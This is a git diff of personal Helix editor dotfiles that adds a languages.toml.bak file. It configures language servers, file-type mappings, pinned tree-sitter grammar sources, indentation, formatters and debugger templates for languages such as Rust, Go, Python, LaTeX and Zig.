language-servers = ["bash-language-server"]
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "markdown"
|
||||||
|
language-servers = ["marksman"]
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "json"
|
||||||
|
language-servers = ["vscode-json-language-server"]
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "yaml"
|
||||||
|
language-servers = ["yaml-language-server"]
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "html"
|
||||||
|
language-servers = ["vscode-html-language-server"]
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "css"
|
||||||
|
language-servers = ["vscode-css-language-server"]
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "go"
|
||||||
|
language-servers = ["gopls"]
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "rust"
|
||||||
|
language-servers = ["rust-analyzer"]
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "zig"
|
||||||
|
language-servers = ["zls"]
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "powershell"
|
||||||
|
language-servers = ["powershell-editor-services"]
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "latex"
|
||||||
|
scope = "source.tex"
|
||||||
|
file-types = ["tex", "sty", "cls", "dtx"]
|
||||||
|
roots = ["main.tex", ".latexmkrc", "body-osr.md"]
|
||||||
|
comment-token = "%"
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
language-servers = ["texlab"]
|
||||||
|
|
||||||
|
[language.auto-pairs]
|
||||||
|
'(' = ')'
|
||||||
|
'{' = '}'
|
||||||
|
'[' = ']'
|
||||||
|
'"' = '"'
|
||||||
|
'`' = "'"
|
||||||
|
'$' = '$'
|
||||||
960
helix/.config/helix/languages.toml.bak
Normal file
960
helix/.config/helix/languages.toml.bak
Normal file
|
|
@ -0,0 +1,960 @@
|
||||||
|
# Language support configuration.
|
||||||
|
# See the languages documentation: https://docs.helix-editor.com/master/languages.html
|
||||||
|
|
||||||
|
use-grammars = { except = [ "wren", "gemini" ] }
|
||||||
|
|
||||||
|
[language-server]
|
||||||
|
|
||||||
|
awk-language-server = { command = "awk-language-server" }
|
||||||
|
bash-language-server = { command = "bash-language-server", args = ["start"] }
|
||||||
|
csharp-ls = { command = "csharp-ls" }
|
||||||
|
docker-langserver = { command = "docker-langserver", args = ["--stdio"] }
|
||||||
|
docker-compose-langserver = { command = "docker-compose-langserver", args = ["--stdio"]}
|
||||||
|
jedi = { command = "jedi-language-server" }
|
||||||
|
ltex-ls = { command = "ltex-ls" }
|
||||||
|
ltex-ls-plus = { command = "ltex-ls-plus" }
|
||||||
|
markdoc-ls = { command = "markdoc-ls", args = ["--stdio"] }
|
||||||
|
markdown-oxide = { command = "markdown-oxide" }
|
||||||
|
marksman = { command = "marksman", args = ["server"] }
|
||||||
|
pylsp = { command = "pylsp" }
|
||||||
|
pyright = { command = "pyright-langserver", args = ["--stdio"], config = {} }
|
||||||
|
pylyzer = { command = "pylyzer", args = ["--server"] }
|
||||||
|
tailwindcss-ls = { command = "tailwindcss-language-server", args = ["--stdio"] }
|
||||||
|
texlab = { command = "texlab" }
|
||||||
|
vscode-css-language-server = { command = "vscode-css-language-server", args = ["--stdio"], config = { provideFormatter = true, css = { validate = { enable = true } } } }
|
||||||
|
vscode-html-language-server = { command = "vscode-html-language-server", args = ["--stdio"], config = { provideFormatter = true } }
|
||||||
|
vscode-json-language-server = { command = "vscode-json-language-server", args = ["--stdio"], config = { provideFormatter = true, json = { validate = { enable = true } } } }
|
||||||
|
yaml-language-server = { command = "yaml-language-server", args = ["--stdio"] }
|
||||||
|
|
||||||
|
[language-server.lua-language-server]
|
||||||
|
command = "lua-language-server"
|
||||||
|
|
||||||
|
[language-server.lua-language-server.config.Lua.hint]
|
||||||
|
enable = true
|
||||||
|
arrayIndex = "Enable"
|
||||||
|
setType = true
|
||||||
|
paramName = "All"
|
||||||
|
paramType = true
|
||||||
|
await = true
|
||||||
|
|
||||||
|
|
||||||
|
[language-server.gopls]
|
||||||
|
command = "gopls"
|
||||||
|
|
||||||
|
[language-server.gopls.config.hints]
|
||||||
|
assignVariableTypes = true
|
||||||
|
compositeLiteralFields = true
|
||||||
|
constantValues = true
|
||||||
|
functionTypeParameters = true
|
||||||
|
parameterNames = true
|
||||||
|
rangeVariableTypes = true
|
||||||
|
|
||||||
|
[language-server.golangci-lint-lsp]
|
||||||
|
command = "golangci-lint-langserver"
|
||||||
|
|
||||||
|
[language-server.golangci-lint-lsp.config]
|
||||||
|
command = ["golangci-lint", "run", "--output.json.path=stdout", "--show-stats=false", "--issues-exit-code=1"]
|
||||||
|
|
||||||
|
[language-server.rust-analyzer]
|
||||||
|
command = "rust-analyzer"
|
||||||
|
|
||||||
|
[language-server.rust-analyzer.config]
|
||||||
|
inlayHints.bindingModeHints.enable = false
|
||||||
|
inlayHints.closingBraceHints.minLines = 10
|
||||||
|
inlayHints.closureReturnTypeHints.enable = "with_block"
|
||||||
|
inlayHints.discriminantHints.enable = "fieldless"
|
||||||
|
inlayHints.lifetimeElisionHints.enable = "skip_trivial"
|
||||||
|
inlayHints.typeHints.hideClosureInitialization = false
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "rust"
|
||||||
|
scope = "source.rust"
|
||||||
|
injection-regex = "rs|rust"
|
||||||
|
file-types = ["rs"]
|
||||||
|
roots = ["Cargo.toml", "Cargo.lock"]
|
||||||
|
shebangs = ["rust-script", "cargo"]
|
||||||
|
auto-format = true
|
||||||
|
comment-tokens = ["//", "///", "//!"]
|
||||||
|
block-comment-tokens = [
|
||||||
|
{ start = "/*", end = "*/" },
|
||||||
|
{ start = "/**", end = "*/" },
|
||||||
|
{ start = "/*!", end = "*/" },
|
||||||
|
]
|
||||||
|
language-servers = [ "rust-analyzer" ]
|
||||||
|
indent = { tab-width = 4, unit = " " }
|
||||||
|
persistent-diagnostic-sources = ["rustc", "clippy"]
|
||||||
|
|
||||||
|
[language.auto-pairs]
|
||||||
|
'(' = ')'
|
||||||
|
'{' = '}'
|
||||||
|
'[' = ']'
|
||||||
|
'"' = '"'
|
||||||
|
'`' = '`'
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "rust"
|
||||||
|
source = { git = "https://github.com/tree-sitter/tree-sitter-rust", rev = "1f63b33efee17e833e0ea29266dd3d713e27e321" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "toml"
|
||||||
|
scope = "source.toml"
|
||||||
|
injection-regex = "toml"
|
||||||
|
file-types = ["toml", { glob = "pdm.lock" }, { glob = "poetry.lock" }, { glob = "Cargo.lock" }, { glob = "uv.lock" }]
|
||||||
|
comment-token = "#"
|
||||||
|
language-servers = [ "taplo" ]
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "toml"
|
||||||
|
source = { git = "https://github.com/ikatyang/tree-sitter-toml", rev = "7cff70bbcbbc62001b465603ca1ea88edd668704" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "awk"
|
||||||
|
scope = "source.awk"
|
||||||
|
injection-regex = "awk"
|
||||||
|
file-types = ["awk", "gawk", "nawk", "mawk"]
|
||||||
|
comment-token = "#"
|
||||||
|
language-servers = [ "awk-language-server" ]
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "awk"
|
||||||
|
source = { git = "https://github.com/Beaglefoot/tree-sitter-awk", rev = "a799bc5da7c2a84bc9a06ba5f3540cf1191e4ee3" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "json"
|
||||||
|
scope = "source.json"
|
||||||
|
injection-regex = "json"
|
||||||
|
file-types = [
|
||||||
|
"json",
|
||||||
|
"arb",
|
||||||
|
"ipynb",
|
||||||
|
"geojson",
|
||||||
|
"gltf",
|
||||||
|
"webmanifest",
|
||||||
|
{ glob = "flake.lock" },
|
||||||
|
{ glob = ".babelrc" },
|
||||||
|
{ glob = ".bowerrc" },
|
||||||
|
{ glob = ".jscrc" },
|
||||||
|
"js.map",
|
||||||
|
"ts.map",
|
||||||
|
"css.map",
|
||||||
|
{ glob = ".jslintrc" },
|
||||||
|
"jsonl",
|
||||||
|
"jsonld",
|
||||||
|
{ glob = ".vuerc" },
|
||||||
|
{ glob = "composer.lock" },
|
||||||
|
{ glob = ".watchmanconfig" },
|
||||||
|
"avsc",
|
||||||
|
"ldtk",
|
||||||
|
"ldtkl",
|
||||||
|
{ glob = ".swift-format" },
|
||||||
|
"sublime-build",
|
||||||
|
"sublime-color-scheme",
|
||||||
|
"sublime-commands",
|
||||||
|
"sublime-completions",
|
||||||
|
"sublime-keymap",
|
||||||
|
"sublime-macro",
|
||||||
|
"sublime-menu",
|
||||||
|
"sublime-mousemap",
|
||||||
|
"sublime-project",
|
||||||
|
"sublime-settings",
|
||||||
|
"sublime-theme",
|
||||||
|
"sublime-workspace"
|
||||||
|
]
|
||||||
|
language-servers = [ "vscode-json-language-server" ]
|
||||||
|
auto-format = true
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "json"
|
||||||
|
source = { git = "https://github.com/tree-sitter/tree-sitter-json", rev = "73076754005a460947cafe8e03a8cf5fa4fa2938" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "jsonc"
|
||||||
|
scope = "source.json"
|
||||||
|
injection-regex = "jsonc"
|
||||||
|
file-types = ["jsonc", { glob = "tsconfig.json" }, { glob = "bun.lock" }]
|
||||||
|
comment-token = "//"
|
||||||
|
block-comment-tokens = { start = "/*", end = "*/" }
|
||||||
|
grammar = "json"
|
||||||
|
language-servers = [ "vscode-json-language-server" ]
|
||||||
|
auto-format = true
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "json5"
|
||||||
|
scope = "source.json5"
|
||||||
|
injection-regex = "json5"
|
||||||
|
file-types = ["json5"]
|
||||||
|
language-servers = []
|
||||||
|
comment-token = "//"
|
||||||
|
indent = { tab-width = 4, unit = " " }
|
||||||
|
# https://json5.org
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "json5"
|
||||||
|
source = { git = "https://github.com/Joakker/tree-sitter-json5", rev = "c23f7a9b1ee7d45f516496b1e0e4be067264fa0d" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "c-sharp"
|
||||||
|
scope = "source.csharp"
|
||||||
|
injection-regex = "c-?sharp"
|
||||||
|
file-types = ["cs", "csx", "cake"]
|
||||||
|
roots = ["sln", "csproj"]
|
||||||
|
comment-token = "//"
|
||||||
|
block-comment-tokens = { start = "/*", end = "*/" }
|
||||||
|
indent = { tab-width = 4, unit = "\t" }
|
||||||
|
language-servers = [ "omnisharp" ]
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "c-sharp"
|
||||||
|
source = { git = "https://github.com/tree-sitter/tree-sitter-c-sharp", rev = "b5eb5742f6a7e9438bee22ce8026d6b927be2cd7" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "go"
|
||||||
|
scope = "source.go"
|
||||||
|
injection-regex = "go"
|
||||||
|
file-types = ["go"]
|
||||||
|
roots = ["go.work", "go.mod"]
|
||||||
|
auto-format = true
|
||||||
|
comment-token = "//"
|
||||||
|
block-comment-tokens = { start = "/*", end = "*/" }
|
||||||
|
language-servers = [ "gopls", "golangci-lint-lsp" ]
|
||||||
|
# TODO: gopls needs utf-8 offsets?
|
||||||
|
indent = { tab-width = 4, unit = "\t" }
|
||||||
|
|
||||||
|
[language.debugger]
|
||||||
|
name = "go"
|
||||||
|
transport = "tcp"
|
||||||
|
command = "dlv"
|
||||||
|
args = ["dap"]
|
||||||
|
port-arg = "-l 127.0.0.1:{}"
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "css"
|
||||||
|
scope = "source.css"
|
||||||
|
injection-regex = "css"
|
||||||
|
file-types = ["css"]
|
||||||
|
block-comment-tokens = { start = "/*", end = "*/" }
|
||||||
|
language-servers = [ "vscode-css-language-server" ]
|
||||||
|
auto-format = true
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "css"
|
||||||
|
source = { git = "https://github.com/tree-sitter/tree-sitter-css", rev = "769203d0f9abe1a9a691ac2b9fe4bb4397a73c51" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "scss"
|
||||||
|
scope = "source.scss"
|
||||||
|
injection-regex = "scss"
|
||||||
|
file-types = ["scss"]
|
||||||
|
block-comment-tokens = { start = "/*", end = "*/" }
|
||||||
|
language-servers = [ "vscode-css-language-server" ]
|
||||||
|
auto-format = true
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "scss"
|
||||||
|
source = { git = "https://github.com/serenadeai/tree-sitter-scss", rev = "c478c6868648eff49eb04a4df90d703dc45b312a" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "html"
|
||||||
|
scope = "text.html.basic"
|
||||||
|
injection-regex = "html"
|
||||||
|
file-types = ["html", "htm", "shtml", "xhtml", "xht", "jsp", "asp", "aspx", "jshtm", "volt", "rhtml", "cshtml"]
|
||||||
|
block-comment-tokens = { start = "<!--", end = "-->" }
|
||||||
|
language-servers = [ "vscode-html-language-server", "superhtml" ]
|
||||||
|
auto-format = true
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "html"
|
||||||
|
source = { git = "https://github.com/tree-sitter/tree-sitter-html", rev = "29f53d8f4f2335e61bf6418ab8958dac3282077a" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "python"
|
||||||
|
scope = "source.python"
|
||||||
|
injection-regex = "py(thon)?"
|
||||||
|
file-types = ["py", "pyi", "py3", "pyw", "ptl", "rpy", "cpy", "ipy", "pyt", { glob = ".python_history" }, { glob = ".pythonstartup" }, { glob = ".pythonrc" }, { glob = "*SConstruct" }, { glob = "*SConscript" }, { glob = "*sconstruct" }]
|
||||||
|
shebangs = ["python", "uv"]
|
||||||
|
roots = ["pyproject.toml", "setup.py", "poetry.lock", "pyrightconfig.json"]
|
||||||
|
comment-token = "#"
|
||||||
|
language-servers = ["ruff", "jedi", "pylsp"]
|
||||||
|
# TODO: pyls needs utf-8 offsets
|
||||||
|
indent = { tab-width = 4, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "python"
|
||||||
|
source = { git = "https://github.com/tree-sitter/tree-sitter-python", rev = "4bfdd9033a2225cc95032ce77066b7aeca9e2efc" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "bash"
|
||||||
|
scope = "source.bash"
|
||||||
|
injection-regex = "(shell|bash|zsh|sh)"
|
||||||
|
file-types = [
|
||||||
|
"sh",
|
||||||
|
"bash",
|
||||||
|
"ash",
|
||||||
|
"dash",
|
||||||
|
"ksh",
|
||||||
|
"mksh",
|
||||||
|
"zsh",
|
||||||
|
"zshenv",
|
||||||
|
"zlogin",
|
||||||
|
"zlogout",
|
||||||
|
"zprofile",
|
||||||
|
"zshrc",
|
||||||
|
"eclass",
|
||||||
|
"ebuild",
|
||||||
|
"bazelrc",
|
||||||
|
"Renviron",
|
||||||
|
"zsh-theme",
|
||||||
|
"cshrc",
|
||||||
|
"tcshrc",
|
||||||
|
"bashrc_Apple_Terminal",
|
||||||
|
"zshrc_Apple_Terminal",
|
||||||
|
{ glob = "i3/config" },
|
||||||
|
{ glob = "sway/config" },
|
||||||
|
{ glob = "tmux.conf" },
|
||||||
|
{ glob = ".bash_history" },
|
||||||
|
{ glob = ".bash_login" },
|
||||||
|
{ glob = ".bash_logout" },
|
||||||
|
{ glob = ".bash_profile" },
|
||||||
|
{ glob = ".bashrc" },
|
||||||
|
{ glob = ".profile" },
|
||||||
|
{ glob = ".zshenv" },
|
||||||
|
{ glob = ".zlogin" },
|
||||||
|
{ glob = ".zlogout" },
|
||||||
|
{ glob = ".zprofile" },
|
||||||
|
{ glob = ".zshrc" },
|
||||||
|
{ glob = ".zimrc" },
|
||||||
|
{ glob = "APKBUILD" },
|
||||||
|
{ glob = ".bash_aliases" },
|
||||||
|
{ glob = ".Renviron" },
|
||||||
|
{ glob = ".xprofile" },
|
||||||
|
{ glob = ".xsession" },
|
||||||
|
{ glob = ".xsessionrc" },
|
||||||
|
{ glob = ".yashrc" },
|
||||||
|
{ glob = ".yash_profile" },
|
||||||
|
{ glob = ".hushlogin" },
|
||||||
|
]
|
||||||
|
shebangs = ["sh", "bash", "dash", "zsh"]
|
||||||
|
comment-token = "#"
|
||||||
|
language-servers = [ "bash-language-server" ]
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "bash"
|
||||||
|
source = { git = "https://github.com/tree-sitter/tree-sitter-bash", rev = "f8fb3274f72a30896075585b32b0c54cad65c086" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "latex"
|
||||||
|
scope = "source.tex"
|
||||||
|
injection-regex = "tex"
|
||||||
|
file-types = ["tex", "sty", "cls", "Rd", "bbx", "cbx"]
|
||||||
|
comment-token = "%"
|
||||||
|
language-servers = [ "texlab" ]
|
||||||
|
indent = { tab-width = 4, unit = "\t" }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "latex"
|
||||||
|
source = { git = "https://github.com/latex-lsp/tree-sitter-latex", rev = "8c75e93cd08ccb7ce1ccab22c1fbd6360e3bcea6" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "bibtex"
|
||||||
|
scope = "source.bib"
|
||||||
|
injection-regex = "bib"
|
||||||
|
file-types = ["bib"]
|
||||||
|
comment-token = "%"
|
||||||
|
language-servers = [ "texlab" ]
|
||||||
|
indent = { tab-width = 4, unit = "\t" }
|
||||||
|
auto-format = true
|
||||||
|
|
||||||
|
[language.formatter]
|
||||||
|
command = 'bibtex-tidy'
|
||||||
|
args = [
|
||||||
|
"-",
|
||||||
|
"--curly",
|
||||||
|
"--drop-all-caps",
|
||||||
|
"--remove-empty-fields",
|
||||||
|
"--sort-fields",
|
||||||
|
"--sort=year,author,id",
|
||||||
|
"--strip-enclosing-braces",
|
||||||
|
"--trailing-commas",
|
||||||
|
]
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "bibtex"
|
||||||
|
source = { git = "https://github.com/latex-lsp/tree-sitter-bibtex", rev = "ccfd77db0ed799b6c22c214fe9d2937f47bc8b34" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "lua"
|
||||||
|
injection-regex = "lua"
|
||||||
|
scope = "source.lua"
|
||||||
|
file-types = ["lua", "rockspec"]
|
||||||
|
shebangs = ["lua", "luajit"]
|
||||||
|
roots = [".luarc.json", ".luacheckrc", ".stylua.toml", "selene.toml", ".git"]
|
||||||
|
comment-token = "--"
|
||||||
|
block-comment-tokens = { start = "--[[", end = "--]]" }
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
language-servers = [ "lua-language-server" ]
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "lua"
|
||||||
|
source = { git = "https://github.com/tree-sitter-grammars/tree-sitter-lua", rev = "88e446476a1e97a8724dff7a23e2d709855077f2" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "yaml"
|
||||||
|
scope = "source.yaml"
|
||||||
|
file-types = [
|
||||||
|
"yml",
|
||||||
|
"yaml",
|
||||||
|
{ glob = ".prettierrc" },
|
||||||
|
{ glob = ".clangd" },
|
||||||
|
{ glob = ".clang-format" },
|
||||||
|
{ glob = ".clang-tidy" },
|
||||||
|
"sublime-syntax"
|
||||||
|
]
|
||||||
|
comment-token = "#"
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
language-servers = [ "yaml-language-server", "ansible-language-server" ]
|
||||||
|
injection-regex = "yml|yaml"
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "yaml"
|
||||||
|
source = { git = "https://github.com/ikatyang/tree-sitter-yaml", rev = "0e36bed171768908f331ff7dff9d956bae016efb" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "zig"
|
||||||
|
scope = "source.zig"
|
||||||
|
injection-regex = "zig"
|
||||||
|
file-types = ["zig", "zon"]
|
||||||
|
roots = ["build.zig"]
|
||||||
|
auto-format = true
|
||||||
|
comment-tokens = ["//", "///", "//!"]
|
||||||
|
language-servers = [ "zls" ]
|
||||||
|
indent = { tab-width = 4, unit = " " }
|
||||||
|
formatter = { command = "zig" , args = ["fmt", "--stdin"] }
|
||||||
|
|
||||||
|
[language.debugger]
|
||||||
|
name = "lldb-dap"
|
||||||
|
transport = "stdio"
|
||||||
|
command = "lldb-dap"
|
||||||
|
|
||||||
|
[[language.debugger.templates]]
|
||||||
|
name = "binary"
|
||||||
|
request = "launch"
|
||||||
|
completion = [ { name = "binary", completion = "filename" } ]
|
||||||
|
args = { console = "internalConsole", program = "{0}" }
|
||||||
|
|
||||||
|
[[language.debugger.templates]]
|
||||||
|
name = "attach"
|
||||||
|
request = "attach"
|
||||||
|
completion = [ "pid" ]
|
||||||
|
args = { console = "internalConsole", pid = "{0}" }
|
||||||
|
|
||||||
|
[[language.debugger.templates]]
|
||||||
|
name = "gdbserver attach"
|
||||||
|
request = "attach"
|
||||||
|
completion = [ { name = "lldb connect url", default = "connect://localhost:3333" }, { name = "file", completion = "filename" }, "pid" ]
|
||||||
|
args = { console = "internalConsole", attachCommands = [ "platform select remote-gdb-server", "platform connect {0}", "file {1}", "attach {2}" ] }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "zig"
|
||||||
|
source = { git = "https://github.com/tree-sitter-grammars/tree-sitter-zig", rev = "eb7d58c2dc4fbeea4745019dee8df013034ae66b" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "markdown"
|
||||||
|
scope = "source.md"
|
||||||
|
injection-regex = "md|markdown"
|
||||||
|
file-types = ["md", "livemd", "markdown", "mdx", "mkd", "mkdn", "mdwn", "mdown", "markdn", "mdtxt", "mdtext", "workbook", { glob = "PULLREQ_EDITMSG" }]
|
||||||
|
roots = [".marksman.toml"]
|
||||||
|
language-servers = [ "marksman", "markdown-oxide" ]
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
block-comment-tokens = { start = "<!--", end = "-->" }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "markdown"
|
||||||
|
source = { git = "https://github.com/tree-sitter-grammars/tree-sitter-markdown", rev = "62516e8c78380e3b51d5b55727995d2c511436d8", subpath = "tree-sitter-markdown" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "markdown.inline"
|
||||||
|
scope = "source.markdown.inline"
|
||||||
|
injection-regex = "markdown\\.inline"
|
||||||
|
file-types = []
|
||||||
|
grammar = "markdown_inline"
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "markdown_inline"
|
||||||
|
source = { git = "https://github.com/tree-sitter-grammars/tree-sitter-markdown", rev = "62516e8c78380e3b51d5b55727995d2c511436d8", subpath = "tree-sitter-markdown-inline" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "dockerfile"
|
||||||
|
scope = "source.dockerfile"
|
||||||
|
injection-regex = "docker|dockerfile"
|
||||||
|
roots = ["Dockerfile", "Containerfile"]
|
||||||
|
file-types = [
|
||||||
|
"Dockerfile",
|
||||||
|
{ glob = "Dockerfile" },
|
||||||
|
{ glob = "Dockerfile.*" },
|
||||||
|
"dockerfile",
|
||||||
|
{ glob = "dockerfile" },
|
||||||
|
{ glob = "dockerfile.*" },
|
||||||
|
"Containerfile",
|
||||||
|
{ glob = "Containerfile" },
|
||||||
|
{ glob = "Containerfile.*" },
|
||||||
|
"containerfile",
|
||||||
|
{ glob = "containerfile" },
|
||||||
|
{ glob = "containerfile.*" },
|
||||||
|
]
|
||||||
|
comment-token = "#"
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
language-servers = [ "docker-langserver" ]
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "dockerfile"
|
||||||
|
source = { git = "https://github.com/camdencheek/tree-sitter-dockerfile", rev = "087daa20438a6cc01fa5e6fe6906d77c869d19fe" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "docker-compose"
|
||||||
|
scope = "source.yaml.docker-compose"
|
||||||
|
roots = ["docker-compose.yaml", "docker-compose.yml"]
|
||||||
|
language-servers = [ "docker-compose-langserver", "yaml-language-server" ]
|
||||||
|
file-types = [{ glob = "docker-compose.yaml" }, { glob = "docker-compose.yml" }]
|
||||||
|
comment-token = "#"
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
grammar = "yaml"
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "git-commit"
|
||||||
|
scope = "git.commitmsg"
|
||||||
|
file-types = [{ glob = "COMMIT_EDITMSG" }, { glob = "MERGE_MSG" }]
|
||||||
|
comment-token = "#"
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
rulers = [51, 73]
|
||||||
|
text-width = 72
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "git-commit"
|
||||||
|
source = { git = "https://github.com/the-mikedavis/tree-sitter-git-commit", rev = "6f193a66e9aa872760823dff020960c6cedc37b3" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "diff"
|
||||||
|
scope = "source.diff"
|
||||||
|
file-types = ["diff", "patch", "rej"]
|
||||||
|
injection-regex = "diff"
|
||||||
|
comment-token = "#"
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "diff"
|
||||||
|
source = { git = "https://github.com/the-mikedavis/tree-sitter-diff", rev = "fd74c78fa88a20085dbc7bbeaba066f4d1692b63" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "git-rebase"
|
||||||
|
scope = "source.gitrebase"
|
||||||
|
file-types = [{ glob = "git-rebase-todo" }]
|
||||||
|
injection-regex = "git-rebase"
|
||||||
|
comment-token = "#"
|
||||||
|
indent = { tab-width = 2, unit = "\t" }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "git-rebase"
|
||||||
|
source = { git = "https://github.com/the-mikedavis/tree-sitter-git-rebase", rev = "d8a4207ebbc47bd78bacdf48f883db58283f9fd8" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "regex"
|
||||||
|
scope = "source.regex"
|
||||||
|
injection-regex = "regex"
|
||||||
|
file-types = ["regex", { glob = ".Rbuildignore" }]
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "regex"
|
||||||
|
source = { git = "https://github.com/tree-sitter/tree-sitter-regex", rev = "e1cfca3c79896ff79842f057ea13e529b66af636" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "git-config"
|
||||||
|
scope = "source.gitconfig"
|
||||||
|
file-types = ["gitconfig", { glob = ".gitmodules" }, { glob = ".gitconfig" }, { glob = ".git/config" }, { glob = ".config/git/config" }]
|
||||||
|
injection-regex = "git-config"
|
||||||
|
comment-token = "#"
|
||||||
|
indent = { tab-width = 4, unit = "\t" }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "git-config"
|
||||||
|
source = { git = "https://github.com/the-mikedavis/tree-sitter-git-config", rev = "9c2a1b7894e6d9eedfe99805b829b4ecd871375e" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "git-attributes"
|
||||||
|
scope = "source.gitattributes"
|
||||||
|
file-types = [{ glob = ".gitattributes" }]
|
||||||
|
injection-regex = "git-attributes"
|
||||||
|
comment-token = "#"
|
||||||
|
grammar = "gitattributes"
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "gitattributes"
|
||||||
|
source = { git = "https://github.com/mtoohey31/tree-sitter-gitattributes", rev = "3dd50808e3096f93dccd5e9dc7dc3dba2eb12dc4" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "git-ignore"
|
||||||
|
scope = "source.gitignore"
|
||||||
|
file-types = [{ glob = ".gitignore_global" }, { glob = "git/ignore" }, { glob = ".ignore" }, { glob = "CODEOWNERS" }, { glob = ".config/helix/ignore" }, { glob = ".helix/ignore" }, { glob = ".*ignore" }]
|
||||||
|
injection-regex = "git-ignore"
|
||||||
|
comment-token = "#"
|
||||||
|
grammar = "gitignore"
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "gitignore"
|
||||||
|
source = { git = "https://github.com/shunsambongi/tree-sitter-gitignore", rev = "f4685bf11ac466dd278449bcfe5fd014e94aa504" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "graphql"
|
||||||
|
scope = "source.graphql"
|
||||||
|
injection-regex = "graphql"
|
||||||
|
file-types = ["gql", "graphql", "graphqls"]
|
||||||
|
language-servers = [ "graphql-language-service" ]
|
||||||
|
comment-token = "#"
|
||||||
|
block-comment-tokens = { start = "\"\"\"", end = "\"\"\"" }
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "solidity"
|
||||||
|
scope = "source.sol"
|
||||||
|
injection-regex = "(sol|solidity)"
|
||||||
|
file-types = ["sol"]
|
||||||
|
comment-token = "//"
|
||||||
|
block-comment-tokens = { start = "/*", end = "*/" }
|
||||||
|
indent = { tab-width = 4, unit = " " }
